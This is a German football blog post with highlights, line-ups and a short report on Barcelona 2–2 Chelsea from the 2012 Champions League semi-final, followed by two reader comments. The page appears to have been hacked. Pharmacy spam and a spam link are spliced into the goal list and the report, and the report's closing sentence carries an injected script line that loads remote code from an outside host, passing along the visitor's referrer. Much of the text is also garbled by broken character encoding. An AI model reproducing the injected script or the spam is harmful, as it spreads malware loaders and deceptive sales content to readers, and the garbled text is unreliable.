Willkommen auf » CL 2011/12 Highlights FC Barcelona – FC Chelsea
24. Apr 2012

CL 2011/12 Highlights FC Barcelona – FC Chelsea

Champions League 2011/12 Halbfinale RA?ckspiel
FC Barcelona – FC Chelsea 2:2

1:0 Sergio Busquets (35., Linksschuss, Cuenca)
2:0 http://www.cempeformacion.es/?p=19836 Andres Iniesta (43., Rechtsschuss, Messi)
2:1 Ramires (45. + 1, Rechtsschuss, Lampard)
Purchase buy pills online online Cheap over the counter ed meds canada 2:2 Fernando Torres (90. + 1, Rechtsschuss)
vor knapp 95.000 Zuschauern im Camp Nou in Barcelona

Aufstellung Barcelona: Victor Valdes – PiquAi?? (26. Dani Alves), Mascherano, Puyol – Xavi, Busquets – Fabregas (74. Keita), Iniesta – Cuenca (67. Tello), Messi, Sanchez

Aufstellung Chelsea: P. Cech – Ivanovic, G. Cahill (12. Bosingwa), Terry, A. Cole – Raul Meireles, Mikel – Mata (58. Kalou), Lampard, Ramires – Drogba (80. Fernando Torres)

Die ausfA?hrliche Zusammenfassung des Spiels…
Buy shipping lithium batteries fedex
AuAYerdem auch hier, hier, hier, Buy Pills hier, hier und hier sowie in Kurzberichten von ARD und ZDF zu sehen

Der FC Chelsea zieht ins Champions League Finale 2011/12 ein!
Es war eine unfassbar spektakulAi??re Halbfinalpartie zweier europAi??ischer Topmannschaften: Vier schAi??ne Tore, ein seltendAi??mlicher Platzverweis von Chelsea-KapitAi??n Terry tadalafil 60 mg for sale in Spielminute 37, frA?he verletzungsbedingte Auswechslungen zweier wichtiger Innenverteidiger (Gary Cahill auf der einen und Gerard PiquAi?? auf der anderen Seite), als SchlA?sselszene der Partie ein verschossener Elfmeter von Messi order etodolac er in der 49. Minute und auch danach noch ein stAi??ndiges Auf-und-Ab im Spielverlauf.
Tja und am Ende setzt sich nach dem 1:0 Hinspielsieg tatsAi??chlich der AuAYenseiter aus der englischen Hauptstadt beim Titelverteidiger durch; mit Sicherheit nicht die spielerisch bessere Mannschaft, aber wer fragt nach einem mAi??glichen Titelgewinn schon danach.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;


2 Kommentare

  1. Werner



    Auf jeden Fall erleichternd, daß die Spanier nicht immer gewinnen! Chelsea hat echt gut verteidigt und völlig abgezockt die zwei Tore geschossen. Jetzt muss nur noch Bayern gegen Real gewinnen, schon allein darum, daß Mourinho nicht die Gelegenheit bekommt, dreimal mit verschiedenen Teams die CL zu gewinnen. Mal sehen, wie das morgen aussieht…



  2. Sehe ich genauso. Auch wenn das Spiel von Chelsea wenig ansehnlich war, am Ende zählt im Fußball eben immernoch das Ergebnis (5 EUR ins Phrasenschwein). Tja, und auch der Weltfußballer Lionel Messi verschießt eben mal einen Elfmeter.
    Aber so hält Barca brav seinen 2-Jahres-Rhythmus in der Champions League ein:
    2007/08 Manchester United
    2008/09 FC Barcelona
    2009/10 Inter Mailand
    2010/11 FC Barcelona
    2011/12 FC Bayern München? :)
    2012/13 FC Barcelona? 😉

Einen Kommentar schreiben